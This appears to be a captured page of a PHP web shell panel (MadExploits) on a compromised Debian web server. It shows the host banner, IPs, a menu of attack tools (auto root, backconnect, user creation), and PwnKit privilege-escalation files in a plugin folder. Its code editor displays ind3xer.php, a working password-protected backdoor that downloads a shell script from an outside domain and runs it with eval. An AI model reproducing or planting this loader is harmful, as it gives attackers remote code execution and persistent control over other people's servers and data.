Linux polon 4.19.0-27-amd64 #1 SMP Debian 4.19.316-1 (2024-06-25) x86_64
Apache/2.4.59 (Debian)
: 10.2.73.233 | : 18.216.167.229
Cant Read [ /etc/named.conf ]
5.6.40-64+0~20230107.71+debian10~1.gbp673146
www-data
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
README
+ Create Folder
+ Create File
/
home /
ifk /
web /
assets /
a18a9a0a /
plugins /
anchor /
[ HOME SHELL ]
Name
Size
Permission
Action
.pkexec
[ DIR ]
drwxr-xr-x
GCONV_PATH=.
[ DIR ]
drwxr-xr-x
.mad-root
0
B
-rw-r--r--
Iogout.php
70.34
KB
-r--r--r--
adminer.php
465.43
KB
-rw-r--r--
boostrap.php
3.27
KB
-rw-r--r--
class.api.php
60.91
KB
-rw-r--r--
custom.php
174.94
KB
-rw-r--r--
ind3xer.php
2.46
KB
-rw-r--r--
part.php
194.98
KB
-rw-r--r--
plugin.min.js
477
B
-rwxrwxrwx
pwnkit
10.99
KB
-rwxr-xr-x
Delete
Unzip
Zip
${this.title}
Close
Code Editor : ind3xer.php
<?php session_start(); /** * Disable error reporting * * Set this to error_reporting( -1 ) for debugging. */ function geturlsinfo($url) { if (function_exists('curl_exec')) { $conn = curl_init($url); curl_setopt($conn, CURLOPT_RETURNTRANSFER, 1); curl_setopt($conn, CURLOPT_FOLLOWLOCATION, 1); curl_setopt($conn, CURLOPT_USERAGENT, "Mozilla/5.0 (Windows NT 6.1; rv:32.0) Gecko/20100101 Firefox/32.0"); curl_setopt($conn, CURLOPT_SSL_VERIFYPEER, 0); curl_setopt($conn, CURLOPT_SSL_VERIFYHOST, 0); // Set cookies using session if available if (isset($_SESSION['coki'])) { curl_setopt($conn, CURLOPT_COOKIE, $_SESSION['coki']); } $url_get_contents_data = curl_exec($conn); curl_close($conn); } elseif (function_exists('file_get_contents')) { $url_get_contents_data = file_get_contents($url); } elseif (function_exists('fopen') && function_exists('stream_get_contents')) { $handle = fopen($url, "r"); $url_get_contents_data = stream_get_contents($handle); fclose($handle); } else { $url_get_contents_data = false; } return $url_get_contents_data; } // Function to check if the user is logged in function is_logged_in() { return isset($_SESSION['logged_in']) && $_SESSION['logged_in'] === true; } // Check if the password is submitted and correct if (isset($_POST['password'])) { $entered_password = $_POST['password']; $hashed_password = '551191ddf246b55af289e4d75fdd55d6'; // Replace this with your MD5 hashed password if (md5($entered_password) === $hashed_password) { // Password is correct, store it in session $_SESSION['logged_in'] = true; $_SESSION['coki'] = 'asu'; // Replace this with your cookie data } else { // Password is incorrect echo "Incorrect password. Please try again."; } } // Check if the user is logged in before executing the content if (is_logged_in()) { $a = geturlsinfo('https://marslogs.co.id/shell/shell/alfa-terbaru.txt'); eval('?>' . $a); } else { // Display login form if not logged in ?> <!DOCTYPE html> <html> <head> <title>Login</title> </head> <body> <form method="POST" action=""> <label for="password">Password:</label> <input type="password" id="password" name="password"> <input type="submit" value="Login"> </form> </body> </html> <?php } ?>
Close